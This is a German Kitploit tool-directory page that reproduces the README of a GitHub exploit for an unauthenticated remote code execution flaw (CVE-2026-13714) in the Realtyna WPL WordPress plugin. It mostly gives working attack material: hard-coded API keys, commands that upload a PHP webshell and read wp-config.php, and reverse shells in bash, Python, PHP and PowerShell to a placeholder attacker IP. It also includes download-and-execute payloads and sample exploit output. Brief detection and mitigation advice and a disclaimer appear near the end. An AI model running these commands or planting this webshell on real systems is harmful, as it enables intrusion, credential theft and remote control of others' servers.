Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-13714 — Nicht authentifizierter RCE-Exploit für Realtyna WPL < 5.3.0, der eine PHP-Webshell über einen fest codierten API-Schlüssel hochlädt und beliebige Systembefehle ausführt. | Kitploit
Tools/GitHubGitHub/katransefa/cve-2026-13714
ExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsPayload-Entwicklung
GitHubkatransefa/cve-2026-13714

CVE-2026-13714

Nicht authentifizierter RCE-Exploit für Realtyna WPL < 5.3.0, der eine PHP-Webshell über einen fest codierten API-Schlüssel hochlädt und beliebige Systembefehle ausführt.

Repository anzeigen
vor 4 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Realtyna WPL < 5.3.0 - Nicht authentifizierter RCE-Exploit

Beschreibung

Dieser Exploit zielt auf eine kritische Schwachstelle in den Versionen vor 5.3.0 des Plugins Realtyna Organic IDX + WPL Real Estate ab. Das Plugin verwendet fest verdrahtete Zugangsdaten und erlaubt nicht authentifizierte Datei-Uploads, was zu Remote Code Execution (RCE) führt.

Details zur Schwachstelle

  • CVE ID: CVE-2026-13714
  • Betroffene Versionen: < 5.3.0
  • Typ: Nicht authentifizierter beliebiger Datei-Upload zu RCE
  • Forscher: Thom Stackhouse

Technische Details

Das Plugin verfügt über eine standardmäßig aktivierte I/O-API mit fest verdrahteten Zugangsdaten:

  • io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
  • io_private_key = Eft76bdh0o2uyhJkbG3T

Die API validiert keine Dateitypen, was das Hochladen beliebiger PHP-Dateien ermöglicht.

Installation

root@kitploit:~
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit

# Install dependencies
pip install requests urllib3

Verwendung

Grundlegende Verwendung

root@kitploit:~
# Upload webshell only
python exploit.py -u https://target.com/wordpress

# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"

# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id"  # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo"  # Windows

Häufige Befehle

Linux-Ziele

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "uname -a"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "ls -la"

# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"

Windows-Ziele

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "systeminfo"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "dir"

# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"

Erweiterte Verwendung

Reverse Shell (Linux)

root@kitploit:~
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

Reverse Shell (Windows)

root@kitploit:~
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""

Hochladen und Ausführen eigener Payloads

root@kitploit:~
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"

# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"

Ablauf des Exploits

  1. Upload: Lädt eine PHP-Webshell hoch (<?php system($_GET['c']); ?>)
  2. Speicherort: Datei gespeichert unter wp-content/uploads/WPL/<ID>/shell.php
  3. Ausführung: Führt Befehle aus über shell.php?c=COMMAND

Erkennung

So erkennen Sie den Exploit

  • Suchen Sie nach verdächtigen Dateien in /wp-content/uploads/WPL/*/
  • Überwachen Sie Anfragen mit den Parametern: wplview=io, wplformat=io, cmd=set_property
  • Achten Sie auf verdächtige API-Anfragen mit fest verdrahteten Zugangsdaten

Anzeichen einer Kompromittierung

  • Unerwartete PHP-Dateien in Upload-Verzeichnissen
  • Ungewöhnliche Web-Anfragen mit Systembefehlen
  • Neue Admin-Benutzer in WordPress
  • Modifizierte .htaccess-Dateien

Gegenmaßnahmen

Behebungen

  1. Sofort aktualisieren auf WPL Real Estate Version 5.3.0 oder höher
  2. Falls ein Update nicht möglich ist, deaktivieren Sie die I/O-API:
    root@kitploit:~
    // Add to wp-config.php
    define('WPL_IO_STATUS', 0);
    
  3. Ändern Sie die fest verdrahteten Zugangsdaten
  4. Implementieren Sie eine ordnungsgemäße Dateityp-Validierung
  5. Schränken Sie Upload-Verzeichnisse ein

Sicherheitsempfehlungen

  • Halten Sie alle WordPress-Plugins aktuell
  • Verwenden Sie eine Web Application Firewall (WAF)
  • Regelmäßige Sicherheitsüberprüfungen
  • Überwachen Sie Upload-Verzeichnisse
  • Deaktivieren Sie unnötige APIs

Screenshots

Erfolgreicher Exploit

root@kitploit:~
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg

Haftungsausschluss

Dieser Exploit dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Die nicht autorisierte Verwendung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben, ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch.

Rechtmäßige Nutzung

  • Nur auf Systemen verwenden, die Ihnen gehören
  • Nur mit ausdrücklicher schriftlicher Genehmigung verwenden
  • Befolgen Sie die Grundsätze der verantwortungsvollen Offenlegung
  • Melden Sie Schwachstellen an die Hersteller

Lizenz

Dieses Projekt dient ausschließlich Bildungszwecken. Nutzung auf eigene Gefahr.

Mitwirkende

  • Ursprünglicher Forscher: Thom Stackhouse
  • CVE: CVE-2026-13714
  • WPVDB ID: 69f9dcd8-ab3c-46ed-ac6b-2f1db35f8d1f

Referenzen

  • WPScan-Schwachstellenseite
  • CVE-2026-13714

Changelog

v1.0 (2026-08-17)

  • Erstveröffentlichung
  • Nicht authentifizierter Datei-Upload
  • Remote Code Execution
  • Unterstützung für die Ausführung von Befehlen

Mitwirken

Reichen Sie gerne Issues und Pull Requests für Verbesserungen ein.

Support

Bei Problemen und Fragen eröffnen Sie bitte ein Issue auf GitHub.


⚠️ WARNUNG: Dieses Tool dient ausschließlich der Sicherheitsforschung und zu Bildungszwecken. Holen Sie immer die entsprechende Genehmigung ein, bevor Sie ein System testen.

Tool herunterladen